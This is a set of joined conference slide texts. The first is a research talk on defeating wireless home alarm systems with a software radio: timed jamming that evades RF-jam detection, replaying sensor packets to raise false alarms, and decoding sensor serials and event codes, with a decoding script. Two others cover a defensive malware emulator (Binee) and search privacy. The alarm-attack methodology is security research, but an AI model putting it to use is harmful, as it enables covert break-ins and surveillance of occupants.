Home Insecurity: No alarms, False alarms, and SIGINT. Logan Lamb, lamblm@ornl.gov

Agenda • Motivation • Models and Methodology • Attack Primitive Implementation • Application to three security systems • Observations • Conclusion

Who am I? • Researcher for Center for Trustworthy Embedded Systems at ORNL • Focus on V2X currently • Ongoing privacy research involving intelligent transportation systems

Home Security System Value • Ostensibly protects your home and occupants from intruders! – Previous hacks • Disable Sensors • Control GSM • Z-Wave (Home Automation) • Lower insurance premiums!

Motivation • Complete dominance of the security system – Render it useless – If possible, make owning a security system a liability

Motivation • Covert Infiltration and Exfiltration • Monitor Behavior • Induce Behavior

Motivation • Covert Infiltration and Exfiltration – Monitoring Company – Occupants • Monitor Behavior • Induce Behavior

Motivation • Covert Infiltration and Exfiltration • Monitor Behavior – Particular Occupants (better for homes) – Aggregate (better for businesses) • Induce Behavior

Motivation • Covert Infiltration and Exfiltration • Monitor Behavior • Induce Behavior – Monitoring Company – Occupants

MODELS AND METHODOLOGY

Adversary Model. Desires…. • General solution • High Yield • Cheap

Adversary Model. Desires…. A WIRELESS hack! • General solution • High Yield • Cheap

Adversary Model. Desires…. A WIRELESS hack! • General solution – Bet the sub GHz RF is similar across manufacturers and super vuln! • High Yield • Cheap

Adversary Model. Desires…. A WIRELESS hack! • General solution • High Yield $$$ – Everything is going wireless! • Cheap

Adversary Model. Desires…. A WIRELESS hack! • General solution • High Yield • Cheap – SDRs are getting cheaper, software is 'cheap'

Adversary Model. Desires…. • Covert Infiltration and Exfiltration: Accomplish with Replay • Monitor Behavior: Accomplish with Replay • Induce Behavior: Accomplish with Replay

Adversary Model. Desires…. • Covert Infiltration and Exfiltration – Attempt with Jamming • Monitor Behavior: Accomplish with Replay • Induce Behavior: Accomplish with Replay

Adversary Model. Desires…. • Covert Infiltration and Exfiltration – Attempt with Jamming • Monitor Behavior – Attempt with SIGINT • Induce Behavior: Accomplish with Replay

Adversary Model. Desires…. • Covert Infiltration and Exfiltration – Attempt with Jamming • Monitor Behavior – Attempt with SIGINT • Induce Behavior – Attempt with Replay

Adversary Model • Only use Software Defined Radio – No ROM dumping (black box testing) • Will not craft custom messages – No protocol fuzzing – No packets of death

Adversary Model • Why so many constraints? – Easy to commodify these attacks if successful – Relax the restrictions if the adversary needs to be more sophisticated!

Security System Model • Build the Model based on the Adversary's capabilities • Intra-system communications are the focus

Security System Model. Types of Intra-Home Communications • Vulnerable – Legacy sub GHz communications • Secure – Everything else

Security System Model. Types of Devices in a System • Sensors • Alarm Devices – Alert occupants and/or monitoring company • Bridges – Convert one communication type to another • Other

Security System Model. Interesting Properties • Sensors trigger their events even when the system is disarmed • Sensors have one way communication • Only alarm devices can alert the stakeholders

Security System Model • Directed Graph – Vertices are devices (Sensors, Alarm Devices, Bridges) – Edges are communication channels (Vulnerable wireless, everything else) – Transmissions flow from sources (sensors) to sinks (alarm devices)

Honeywell Devices

Honeywell Digraph • 5 Sensors – 2 Door – 3 Motion • 2 Alarm Devices – 1 Keypad – 1 Control Panel

Methodology 1. Identify all devices and their communication type(s) 2. Generate a digraph from sources to sinks 3. If there are any wireless communications, attempt the SIGINT attack primitive 4. If a path exists from source to sink that involves a wireless communication channel, attempt the Jamming and Replay attack primitives 5. Evaluate the attained level of control and situation awareness

ATTACK PRIMITIVE IMPLEMENTATION

Prerequisites • Software Defined Radio, USRP N210 • GNU Radio • Tuned Antenna • System to test with – Honeywell

Tuning In • Spectrum Analyzer – Dedicated – Build with SDR – Consult FCC documentation

Jamming • Spot Jamming – Blast noise! :D – It….works? Really? • Manufacturers are aware of the threat – Introducing 'RF Jam' – Once enabled, the spot jammer fails

Periodic Jamming • At what point does the interference go from benign to malicious? – Noise floor – Number of malformed transmissions

Noise Floor Testing • How long can the spot jammer be used? – About a minute • Noise floor is checked

Malformed Packet Testing • In GRC, layout flow chart that flips bits – Induce errors – Low duty cycle

How quickly can we turn simple jamming off and on? • Pretty quick, about ¼ of a second • Is that good? – Yup – Supervisory transmission requires 0.77 s – Alarm transmission requires 3.54 s

What does this get us? • RF Jam Disabled – Covert infiltration and exfiltration • RF Jam Enabled – Covert infiltration, exfiltration, and alarm triggering – When enabled, RF Jam is a liability

SIGINT • Tiers of complexity – RF Capture – Bitstream – Protocol Capture • We know what that means

RF Capture • Simple in GRC – Useful if more intel is available

Bitstream Capture

Bitstream -> Packets • Helpful if more intel is available – From the FCC • Manchester encoded • 3200 Baud • Word length 64 bits • Packets are repeated to form a transmission

Bitstream -> Packets • Just Software – Read bitstream from stdin – Figure out the number of samples per bit – Convert samples to bits – Manchester decode and print

Honeywell Door Packets • 0xfffe 84d4 0280 512c • 0xfffe 84d4 02a0 d1ef • 0xfffe 84d4 02e0 506c • 0xfffe 8faa 8380 4d3d • 0xfffe 8faa 83a0 cdfe • 0xfffe 8faa 83e0 4c7d

Reverse Engineering • 0xfffe 84d4 0280 512c • 0xfffe 84d4 02a0 d1ef • 0xfffe 84d4 02e0 506c • 0xfffe 8faa 8380 4d3d • 0xfffe 8faa 83a0 cdfe • 0xfffe 8faa 83e0 4c7d. Device Serial: A 031-6418. Device Serial: A 102-6691

Reverse Engineering • 0xfffe – In every packet – Looks like a preamble and sync bit

Reverse Engineering • 0x{80, a0, e0} – All three appear for both sensors – 0xa0: Open Event – 0x80: Closed Event – 0xe0: Tamper Event

Reverse Engineering • 0x{84d402, 8faa83} – Unique to each sensor, in every packet – 0x84d402: No significance, but – 0x4d402 is 316,418 in decimal – 316,418 -> A 031-6418 – 0x8faa83 -> A 102-6691

Reverse Engineering • 0x{512c, d1ef, 506c, 4d3d, cdfe, 4c7d} – What is this? Different for each packet seen – Probably a CRC, time to break out… – REVENG

CRC Reversing with REVENG • Arbitrary-precision CRC calculator and algorithm finder • Search every packet for a one byte or two byte CRC • Easy bash script…

Reverse Engineering • 0xfffe 84d4 0280 512c • 0xfffe – Preamble and sync bit • 0x84d402 – Serial • 0x80 – Event type • 0x512c – CRC-16/BUYPASS

What does this get us? • Monitoring capability – Helps with Situational Awareness • How? – Different sensors transmit different events – Sensors are installed in logical locations

Replay • What does this get us? – Induce behavior with false alarms

APPLICATION TO THREE SYSTEMS

Honeywell • Covered in the attack primitive implementation section • Summary – Covert Infiltration and Exfiltration – Induce Behavior – Monitor Behavior

ADT Devices

ADT Digraph • 8 Sensors – 4 Door – 3 Glass Break – 1 Motion • 1 Alarm Device – 1 Panel (GSM out)

ADT Specifics • Completely Wireless • RF Jam Detection capable, but disabled • Unable to get Installer Code – Yeah, there's a fee for that – Thanks ADT

ADT Changes • Simple Jammer and Replay – Center Frequency change to 433.96 • SIGINT – Center Frequency change to 433.96 – Reverse Engineering not implemented, but all info is given in FCC Documentation…

ADT Changes. Just Needs to be Implemented!

ADT • Summary – Covert Infiltration and Exfiltration – Induce Behavior – Monitor Behavior • Not currently implemented

2GIG Devices

2GIG Digraph • 6 Sensors – 5 Door – 1 Motion • 2 Alarm Devices – 1 Go!Control Panel – 1 12V Control Panel • 1 Bridge Device – 2GIG Takeover Module

2GIG Digraph. 2GIG Equivalent Digraph

2GIG Specifics • Hybrid System – Wired and wireless devices – RF Jam Detection capable, but disabled • Sooo, we enabled it!

2GIG • Summary – Covert Infiltration and Exfiltration – Induce Behavior – Monitor Behavior

Observations – Full control and monitoring on all systems – Simple communications – Legacy communications

Thanks! Logan Lamb, lamblm@ornl.gov
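As a companion to the "Bitstream -> Packets" and reverse-engineering slides above, a minimal Python sketch of the decode chain: collapse Manchester symbol pairs into data bits, then split a 64-bit word into the preamble/serial/event/CRC fields named on the slides. The Manchester polarity and the exact byte range covered by the CRC-16/BUYPASS are assumptions to confirm against a real capture (for example with reveng); this is not the speaker's original code.

def manchester_decode(symbol_bits):
    # Collapse Manchester symbol pairs into data bits.  The polarity chosen
    # here (10 -> 1, 01 -> 0) is an assumption; flip it if the decoded words
    # do not start with the 0xfffe preamble.
    mapping = {"10": "1", "01": "0"}
    return "".join(mapping.get(symbol_bits[i:i + 2], "?")
                   for i in range(0, len(symbol_bits) - 1, 2))

def crc16_buypass(data):
    # CRC-16/BUYPASS: poly 0x8005, init 0x0000, no reflection, no final XOR.
    crc = 0x0000
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x8005) & 0xFFFF if crc & 0x8000 else (crc << 1) & 0xFFFF
    return crc

def parse_word(word_hex):
    # Split one 64-bit Honeywell word into the fields named on the slides.
    raw = bytes.fromhex(word_hex)
    fields = {
        "preamble": raw[0:2].hex(),   # 0xfffe in every packet
        "serial":   raw[2:5].hex(),   # e.g. 0x84d402 -> A 031-6418
        "event":    hex(raw[5]),      # 0x80 closed / 0xa0 open / 0xe0 tamper
        "crc":      raw[6:8].hex(),
    }
    # Which bytes the CRC covers is an assumption here; confirm with reveng.
    fields["crc_calc"] = format(crc16_buypass(raw[0:6]), "04x")
    return fields

print(parse_word("fffe84d40280512c"))
print(manchester_decode("1010010110"))   # tiny made-up symbol stream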
pdf
Next Generation Process Emulation with Binee Kyle Gwinnup @switchp0rt John Holowczak @skipwich Carbon Black TAU The Problem: getting information from binaries Each sample contains some total set of information. Our goal is to extract as much of it as possible Time/Cost to analyze Sample coverage Static Dynamic High coverage Immediate discovery Few features Low coverage Long discovery Many features Core Problems 1. Obfuscation hides much of the info 2. Anti-analysis is difficult to keep up with 3. Not all Malware is equal opportunity Our Goal: Reduce cost of information extraction 1. Reduce the cost of features extracted via dynamic analysis 2. Increase total number of features extracted via static analysis 3. Ideally, do both of these at scale Time/Cost to analyze Sample Coverage Dynamic Static + Emulation High coverage Immediate discovery Many features Low coverage Long discovery Many features The How: Emulation Extend current emulators by mocking functions, system calls and OS subsystems Existing PE Emulators ● PyAna https://github.com/PyAna/PyAna ● Dutas https://github.com/dungtv543/Dutas ● Unicorn_pe https://github.com/hzqst/unicorn_pe ● Long list of other types of emulators https://www.unicorn-engine.org/showcase/ Requirements: What are we adding/extending from current work? 1. Mechanism for loading up a PE file with its dependencies 2. Framework for defining function and API hooks 3. Mock OS subsystems such as a. Memory management b. Registry c. File system d. Userland process structures 4. Mock OS environment configuration file a. Config file specifies language, keyboard, registry keys, etc… b. Rapid transition from one Mock OS configuration to another Binee Where to start? Parse the PE and DLLs, then map them into emulation memory... Build hook table by linking DLLs outside emulator Target PE DLL1 DLL2 DLL3 Emulated Process Memory Binee Address to Hook table 1. Open PE and all dependencies 2. Update DLL base addresses 3. Update relocations 4. Build Binee exports lookup table 5. Resolve Import Address Tables for each 6. Map PE and DLLs into memory Overcoming Microsoft’s ApiSet abstraction layer Parse ApiSetSchema.dll (multiple versions) and load proper real dll. Geoff Chappell https://www.geoffchappell.com/studies/windows/win32/apisetschema/index.htm api-ms-<something>.dll ApiSet Schema Table kernelbase.dll kernel32:CreateFileA What is the minimum that the malware needs in order to continue proper execution? Requirements for hooking 1. A mapping of real address to Binee’s Hook for that specific function? 2. The calling convention used? 3. How many parameters are passed to the function? 4. Need to determine the return value if any? type Hook struct { Name string Parameters []string Fn func(*WinEmulator, *Instruction) bool Return uint64 ... 
} emu.AddHook("", "Sleep", &Hook{ Parameters: []string{"dwMilliseconds"}, Fn: func(emu *WinEmulator, in *Instruction) bool { emu.Ticks += in.Args[0] return SkipFunctionStdCall(false, 0x0)(emu, in) }, }) Partial Hook, where the function itself is emulated within the DLL emu.AddHook("", "GetCurrentThreadId", &Hook{Parameters: []string{}}) emu.AddHook("", "GetCurrentProcess", &Hook{Parameters: []string{}}) emu.AddHook("", "GetCurrentProcessId", &Hook{Parameters: []string{}}) Two types of hooks in Binee Full Hook, where we define the implementation Hook Parameters field defines how many parameters will be retrieved from emulator and The name/value pair in output [1] 0x21bc0780: P memset(dest = 0xb7feff1c, char = 0x0, count = 0x58) emu.AddHook("", "memset", &Hook{Parameters: []string{"dest", "char", "count"}}) Output is the following Example: Entry point execution ./binee -v tests/ConsoleApplication1_x86.exe [1] 0x0040142d: call 0x3f4 [1] 0x00401821: mov ecx, dword ptr [0x403000] [1] 0x0040183b: call 0xffffff97 [1] 0x004017d2: push ebp [1] 0x004017d3: mov ebp, esp [1] 0x004017d5: sub esp, 0x14 [1] 0x004017d8: and dword ptr [ebp - 0xc], 0 [1] 0x004017dc: lea eax, [ebp - 0xc] [1] 0x004017df: and dword ptr [ebp - 8], 0 [1] 0x004017e3: push eax [1] 0x004017e4: call dword ptr [0x402014] [1] 0x219690b0: F GetSystemTimeAsFileTime(lpSystemTimeAsFileTime = 0xb7feffe0) = 0xb7feffe0 [1] 0x004017ea: mov eax, dword ptr [ebp - 8] [1] 0x004017ed: xor eax, dword ptr [ebp - 0xc] [1] 0x004017f0: mov dword ptr [ebp - 4], eax [1] 0x004017f3: call dword ptr [0x402018] At this point, we have a simple loader that will handle all mappings of imports to their proper DLL. We’re basically done, right? Still have some functions that require user land memory objects that do not transition to kernel via system calls We need segment registers to point to the correct memory locations (thanks @ceagle) Not inside of main yet… Userland structures, TIB/PEB/kshareduser We need a TIB and PEB with some reasonable values Generally, these are configurable. Many just need some NOP like value, e.g. NOP function pointer for approximate malware emulation. All address resolution and mappings are built outside of the emulator type ThreadInformationBlock32 struct { CurentSEH uint32 //0x00 StackBaseHigh uint32 //0x04 StackLimit uint32 //0x08 SubSystemTib uint32 //0x0c FiberData uint32 //0x10 ArbitraryDataSlock uint32 //0x14 LinearAddressOfTEB uint32 //0x18 EnvPtr uint32 //0x1c ProcessId uint32 //0x20 CurrentThreadId uint32 //0x24 … } PEs are parsed and loaded. Basic structures like the segment registers and TIB/PEB are mapped with minimum functionality. We’re defining the entire environment outside of the emulator... Almost Everything in Windows needs HANDLEs type Handle struct { Path string Access int32 File *os.File Info os.FileInfo RegKey *RegKey Thread *Thread } type WinEmulator struct { ... Handles map[uint64]*Handle ... } What is the minimum we need for a HANDLE in Binee? 1. An abstraction over subsystem data types 2. Helper methods for reading/writing/etc... to and from subsystems. HANDLEs get allocated directly from the Heap The Heap plays a central role in Binee The Heap is what enables and ultimately distributes HANDLEs for all other emulation layers, including file IO and the registry. kernel32:* ntdll:* Binee MM Basically, anything not in the stack after execution has started goes into Binee’s Heap Manager. Now we have a decent core, at least with respect to the user land process. 
Now it is time to build out the Mock OS subsystems Starting with the Mock File System What are the requirements for CreateFileA? Returns a valid HANDLE into EAX register Creating Files in the Mock File Subsystem CreateFile Emulator Full Hook Handler HANDLE Lookup Table Full hook captures HANDLE from parameters to CreateFile If file exists in Mock File System or permissions are for “write”. Create a new Handle object and get unique ID from Heap Manager Write HANDLE back to EAX Writing Files in the Mock File Subsystem WriteFile Emulator Full Hook Handler HANDLE Lookup Table Temp Real File System (Sandboxed) Full hook captures HANDLE from parameters to WriteFile HANDLE is used as key to lookup actual Handle object outside of emulator All writes are written to sandboxed file system for later analysis. Malware thinks file was written to proper location and continues as if everything is successful [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'ERROR_SUCCESS = 0x%x\n', p0 = 0x0) = 0x403380 [1] 0x21970b80: F CreateFileA(lpFileName = 'malfile.exe', dwDesiredAccess = 0xc0000000, dwShareMode = 0x0, lpSecurityAttributes = 0x0, dwCreationDisposition = 0x2, dwFlagsAndAttributes = 0x80, hTemplateFile = 0x0) = 0xa00007b6 [1] 0x219c8fbe: F VerSetConditionMask() = 0xa00007b6 [1] 0x20af60a0: P __acrt_iob_func() = 0xa00007b6 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'out = 0x%x\n', p0 = 0xa00007b6) = 0x403380 [1] 0x219c8fbe: F VerSetConditionMask() = 0x403380 [1] 0x20af60a0: P __acrt_iob_func() = 0x403380 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'out = 0x%x\n', p0 = 0x403380) = 0x403380 [1] 0x219c8fbe: F VerSetConditionMask() = 0x403380 [1] 0x20af60a0: P __acrt_iob_func() = 0x403380 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'out = 0x%x\n', p0 = 0x403380) = 0x403380 [1] 0x218f5780: P memset(dest = 0xb7feff1c, char = 0x0, count = 0x58) = 0xb7feff1c [1] 0x21971000: F WriteFile(hFile = 0xa00007b6, lpBuffer = 0xb7feff10, nNumberOfBytesToWrite = 0xb, lpNumberOfBytesWritten = 0xb7feff0c, lpOverlapped = 0x0) = 0xb [1] 0x21969500: F IsProcessorFeaturePresent(ProcessorFeature = 0x17) = 0x1 [1] 0x2196cef0: F SetUnhandledExceptionFilter(lpTopLevelExceptionFilter = 0x0) = 0x4 And in the console > ls temp malfile.exe > cat temp/malfile.exe hello world Now you can see the file contents. Obviously trivial… more to come…. At this point, the user space is largely mocked. We also have the ability to hook functions, dump parameters and modify the call execution. Additionally, we have some mock HANDLEs. Can we emulate more?! 
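Binee itself is written in Go, so the following is only a language-neutral illustration (in Python) of the CreateFile/WriteFile flow just described: hand out HANDLE-like integers from a counter and silently redirect every write into a sandbox directory. The class name, the "temp" sandbox path, and the starting handle value are all invented for the example.

import os

class MockFileSystem:
    # Toy HANDLE table plus sandboxed writes, mirroring the flow on the
    # slides: the emulated program gets an opaque HANDLE back, and everything
    # it writes lands in a local sandbox directory for later analysis.
    def __init__(self, sandbox="temp"):
        self.sandbox = sandbox
        self.handles = {}                  # HANDLE value -> backing file object
        self.next_handle = 0xA0000000      # arbitrary starting value for the toy
        os.makedirs(sandbox, exist_ok=True)

    def create_file(self, requested_path, desired_access=0):
        # Only the basename is honored; the real target path is never touched.
        backing = os.path.join(self.sandbox, os.path.basename(requested_path))
        handle = self.next_handle
        self.next_handle += 1
        self.handles[handle] = open(backing, "wb")
        return handle                      # the hook would write this into EAX

    def write_file(self, handle, data):
        f = self.handles[handle]
        f.write(data)
        f.flush()
        return len(data)                   # bytes written, as WriteFile reports

fs = MockFileSystem()
h = fs.create_file("malfile.exe", desired_access=0xC0000000)
print(hex(h), fs.write_file(h, b"hello world"))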
Mock Registry Subsystem RegOpenKeyA Mock Registry Emulator Full Hook on Registry functions Our hook interacts with the Mock Registry subsystem that lives outside of the emulation Mock Registry has helper functions to automatically convert data to proper types and copy raw bytes back into emulation memory Configuration files defines OS environment quickly ● Yaml definitions to describe as much of the OS context as possible ○ Usernames, machine name, time, CodePage, OS version, etc… ● All data gets loaded into the emulated userland memory root: "os/win10_32/" code_page_identifier: 0x4e4 registry: HKEY_CURRENT_USER\Software\AutoIt v3\AutoIt\Include: "yep" HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Arbiters\InaccessibleRange\Psi: "PhysicalAddress" HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Arbiters\InaccessibleRange\Root: "PhysicalAddress" HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Arbiters\InaccessibleRange\PhysicalAddress: "hex(a):48,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,0 0,00,00,01,00,00,00,00,03,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,01,00,ff,ff,ff,ff,ff,f f,ff,ff" [1] 0x2230c420: F RegOpenKeyExA(hKey = 'HKEY_LOCAL_MACHINE', lpSubKey = 'SYSTEM\ControlSet001\Control\Windows', ulOptions = 0x0, samDesired = 0x20019, phkResult = 0xb7feff40) = 0x0 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'successfully opened key %s\n', p0 = 'SYSTEM\ControlSet001\Control\Windows') = 0x403378 [1] 0x2230c3e0: F RegQueryValueExA(key = 0xa000099c, lpValueName = 'ComponentizedBuild', lpReserved = 0x0, lpType = 0xb7feff44, lpData = 0xb7feff4c, lpcbData = 0xb7feff48) = 0x0 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'status code = 0x%x\n', p0 = 0x0) = 0x403378 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'ComponentizedBuild = %d\n', p0 = 0x1) = 0x403378 [1] 0x2230c3e0: F RegQueryValueExA(key = 0xa000099c, lpValueName = 'CSDBuildNumber', lpReserved = 0x0, lpType = 0xb7feff44, lpData = 0xb7feff4c, lpcbData = 0xb7feff48) = 0x0 [1] 0x20af60a0: P __acrt_iob_func() = 0x0 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'CSDBuildNumber = %d\n', p0 = 0x194) = 0x403378 [1] 0x2230c1d0: F RegCloseKey(key = 0xa000099c) = 0x0 [1] 0x22336bd0: F RegCreateKeyA(hKey = 'HKEY_CURRENT_USER', lpSubKey = 'Software\Binee', phkResult = 0xb7feff40) = 0x0 [1] 0x20b05710: F __stdio_common_vfprintf(stream = 0x0, format = 'successfully opened key %s\n', p0 = 'Software\Binee') = 0x403378 [1] 0x22337640: F RegSetValueA(hKey = '', lpSubKey = 'Testing', dwType = 0x1, lpDate = 0xb7feff80, cbData = 0x0) = 0x57 Configuration files can be used to make subtle modifications to the mock environment which allows you to rapidly test malware in diverse environments Let’s do more... Mocked Threading Round robin scheduler approximately simulates a multi-thread environment. Time slices are configurable but equal for each “thread” of execution. Thread manager handles all the context switching and saving of registers. Allows us to hand wave (punt for later) most multithreading issues. 
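As a rough conceptual sketch of the round-robin scheduling just described (Binee's real thread manager is Go code inside the emulator), the idea of equal, configurable time slices can be shown with generator-based "threads" in Python; the tick counts and slice size below are invented for illustration.

from collections import deque

def worker(tid, total_ticks):
    # One "instruction window" of work per resume
    for tick in range(total_ticks):
        yield "tid %d, tick %d" % (tid, tick)

def round_robin(threads, slice_ticks=2):
    # Give each runnable thread an equal, fixed slice, then rotate it to the
    # back of the queue; a finished thread is simply dropped.
    runnable = deque(threads)
    while runnable:
        thread = runnable.popleft()
        for _ in range(slice_ticks):
            try:
                print(next(thread))
            except StopIteration:
                break                    # thread finished inside its slice
        else:
            runnable.append(thread)      # slice used up, requeue for later

round_robin([worker(1, 5), worker(2, 3), worker(3, 4)])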
Thread 1 Thread 2 Thread 3 Thread 4 Thread Manager Threads inside the emulator [1] 0x20ae3f80: F CreateThread(lpThreadAttributes = 0x0, dwStackSize = 0x0, lpStartAddress = 0x401040, lpParameter = 0xa01007ee, dwCreationFlags = 0x0, lpThreadId = 0x0) = 0x3 [1] 0x20ae06d0: F GetProcessHeap() = 0x123456 [2] 0x20dd0710: F __stdio_common_vfprintf(stream = 0x0, format = 'tid %d, count %d\n', p0 = 0x0, p1 = 0x0) = 0x403378 [3] 0x20dc10a0: P __acrt_iob_func() = 0xa01007ee [1] 0x20b3f05a: F HeapAlloc(hHeap = 0x123456, dwFlags = 0x8, dwBytes = 0x4) = 0xa0200826 [1] 0x20ae3f80: F CreateThread(lpThreadAttributes = 0x0, dwStackSize = 0x0, lpStartAddress = 0x401040, lpParameter = 0xa0200826, dwCreationFlags = 0x0, lpThreadId = 0x0) = 0x4 [2] 0x20dc10a0: P __acrt_iob_func() = 0x403378 [3] 0x20dd0710: F __stdio_common_vfprintf(stream = 0x0, format = 'tid %d, count %d\n', p0 = 0x1, p1 = 0x0) = 0x403378 [1] 0x20aeaaf0: **WaitForMultipleObjects**() = 0xb7feffa4 [1] 0x2011e5a0: **WaitForMultipleObjects**() = 0xb7feffa4 [2] 0x20dc10a0: P __acrt_iob_func() = 0x403378 [4] 0x20dc10a0: P __acrt_iob_func() = 0xa0200826 [1] 0x2011e5d0: **WaitForMultipleObjectsEx**() = 0xb7feffa4 [3] 0x20dc10a0: P __acrt_iob_func() = 0x403378 [2] 0x20dd0710: F __stdio_common_vfprintf(stream = 0x0, format = 'tid %d, count %d\n', p0 = 0x0, p1 = 0x1) = 0x403378 Increasing fidelity with proper DllMain execution Need to setup stack for DllMain call, set up proper values for DLLs loaded by the PE. Call this for every DLL loaded by the PE. But how to do this in the emulator? Start emulation at each DllMain and stop at ??? BOOL WINAPI DllMain( _In_ HINSTANCE hinstDLL, _In_ DWORD fdwReason, _In_ LPVOID lpvReserved ); ROP Gadgets — an easy shortcut to loading DLLs A simpler approach is to only start the emulator once when the entire process space is layed out. However, the start point is no longer the PE entry point. Instead, entry point is now the start of our ROP chain that calls each loaded DllMain in order and ending with the PE’s entry point address lpvReserved fdwReason hinstDll ret lpvReserved fdwReason hinstDll ret lpvReserved fdwReason hinstDll ret envp argv argc dll_1 dll_2 dll_3 malware Demos ● ea6<sha256> shows unpacking and service starting ● ecc<sha256> shows unpacking and wrote malicious dll to disk, loaded dll and executed it We’ve open-sourced this — What’s next ● Increase fidelity with high quality hooks ● Single step mode, debugger style ● Networking stack and implementation, including hooks ● Add ELF (*nix) and Mach-O (macOS) support ● Anti-Emulation Thank you and come hack with us https://github.com/carbonblack/binee
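Circling back to the "ROP Gadgets as an easy shortcut to loading DLLs" idea a few slides up, here is a schematic Python sketch of laying out one fake stdcall frame per DllMain so that each call returns into the next DllMain and the last one returns into the PE entry point. The slot ordering, the trailing argc/argv/envp, and every address used are stand-ins for illustration, not Binee's actual layout or code.

import struct

DLL_PROCESS_ATTACH = 1

def build_dllmain_chain(dlls, pe_entry, argc=1, argv=0, envp=0):
    # dlls: list of (dllmain_address, image_base) pairs, in load order.
    return_targets = [addr for addr, _ in dlls[1:]] + [pe_entry]
    words = []
    for (dllmain, image_base), ret_to in zip(dlls, return_targets):
        words += [ret_to, image_base, DLL_PROCESS_ATTACH, 0]  # ret, hinstDLL, fdwReason, lpvReserved
    words += [argc, argv, envp]                               # what main() eventually sees
    stack = b"".join(struct.pack("<I", w & 0xFFFFFFFF) for w in words)
    return dlls[0][0], stack              # start emulation at the first DllMain

# Hypothetical addresses purely for illustration
start, stack = build_dllmain_chain(
    [(0x10001000, 0x10000000), (0x6B801234, 0x6B800000)], pe_entry=0x00401000)
print(hex(start), stack.hex())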
pdf
The Hacker Pimps The Hexagon Security Group Creating Unreliable Systems “Attacking the Systems that Attack You” Sysmin Sys73m47ic & Marklar From: The Hacker Pimps The Hacker Pimps The Hexagon Security Group Document Versioning ● For a copy of this presentation visit: ● www.hackerpimps.com/docs.html The Hacker Pimps The Hexagon Security Group Warning!!! ● Some of the techniques discussed in this presentation can be hazardous to your personal freedoms. – Mainly the staying out of jail part ● Everything discussed in this presentation is strictly theoretical ;) The Hacker Pimps The Hexagon Security Group Why? ● Why do we want to create unreliable systems? Isn't that the opposite of what we are supposed to do? ● Don't people get paid to make systems reliable? ● Unreliable systems can not be counted on. The Hacker Pimps The Hexagon Security Group Technology Changes Everything ● We do not have new problems, we have new technology. ● We seem to love having our freedoms taken away, just because things are cool or convenient. ● Companies and the Government are finding newer more sneaky ways to get your information. The Hacker Pimps The Hexagon Security Group A Presumptive Right To Privacy? Why not presume the right/need for privacy? The number one excuse: “I've got nothing to hide!” This is the comfortable position of those who are not marginalized. The Hacker Pimps The Hexagon Security Group Are you: In great pain and unable to legally manage pain? Gay and in the military? Needing to express unpopular views that would otherwise risk your safety? A whistle blower? A security researcher? The Hacker Pimps The Hexagon Security Group Privacy “I don't care that X is watching me. I'm not doing anything wrong!” Who might X be? The Hacker Pimps The Hexagon Security Group The Executive Branch The Hacker Pimps The Hexagon Security Group The Other Executive Branch The Hacker Pimps The Hexagon Security Group The Imaginary Judicial Branch The Hacker Pimps The Hexagon Security Group The Other Imaginary Judicial Branch The Hacker Pimps The Hexagon Security Group The No Such Branch Branch The Branch Which Must-Not-Be-Named The Hacker Pimps The Hexagon Security Group Your Bad Neighbor The Hacker Pimps The Hexagon Security Group Your Nosy Neighbor The Hacker Pimps The Hexagon Security Group Your Good Neighbor The Hacker Pimps The Hexagon Security Group Picking A Target What Information Gathering System provides the most comprehensive aggregate of what you are thinking about? Perhaps Web Search? The Hacker Pimps The Hexagon Security Group Target Information Gathering System The Hacker Pimps The Hexagon Security Group Web Search Privacy Information: IP Address Cookies Sessions Browser addons / components Flash/Java/JavaScript, etc: The Interactive Web! The Hacker Pimps The Hexagon Security Group Dilemma The things that make the web useful are often potentially invasive The Hacker Pimps The Hexagon Security Group Proposed Architecture for Web Search Privacy 1. Existing: Tor + TorButton Summary: Hide your IP Address The Hacker Pimps The Hexagon Security Group Proposed Architecture for Web Search Privacy 2. Proposed “Quiet” button ● Turn off automatic search completion (automatic with Tor) ● Block access to cookies: use/keep cookies, but make them inaccesable on demand. ●Alternatively, the imilly.com google cookie anonymizer (but what about other search engines) The Hacker Pimps The Hexagon Security Group Proposed Architecture for Web Search Privacy 3. 
Proposed Plugin: P2P Web Search Identity Diffusion On demand, hide in a crowd A Nifty, Helpful, Insufficient Idea The Hacker Pimps The Hexagon Security Group P2P Identity Diffusion When you do a web search, a. N ?= 30 instances of the query terms are put on P2P b. the plugin downloads N queries from P2P c. a and b are executed through Tor,hiding your IP address. d. The N searches are executed in the background e. the original search is executed after (rand() % N) P2P queries are executed f. User-Agent is modified to indicate P2P Search Summary: The origin of an individual query will still diffuse among N browsers The Hacker Pimps The Hexagon Security Group Why Insufficient? Aggregates and Standing out from the crowd. Changing Models The Hacker Pimps The Hexagon Security Group Where do you stand in the aggregate picture? Google Analytics is interesting Sometimes it's not what you'd think The Hacker Pimps The Hexagon Security Group Google Analytics: Sheep Sex The Hacker Pimps The Hexagon Security Group Google Analytics: Goatse The Hacker Pimps The Hexagon Security Group Google Analytics: Stocks The Hacker Pimps The Hexagon Security Group Google Analytics: Stock The Hacker Pimps The Hexagon Security Group Please Note: I AM NOT A TERRORIST The Hacker Pimps The Hexagon Security Group Google Analytics: terrorists The Hacker Pimps The Hexagon Security Group Google Analytics: terrorism The Hacker Pimps The Hexagon Security Group Google Analytics: Terror,Terrorists, and Terrorism The Hacker Pimps The Hexagon Security Group Google Analytics: Terror,Terrorists, and Terrorism WTF? The Hacker Pimps The Hexagon Security Group The Point 1. Wake Up! It's not like they say on the news 2. (The “real” point): Diffusing a query source is insufficient until N is sufficiently large to smooth your graph down into the aggregate picture The Hacker Pimps The 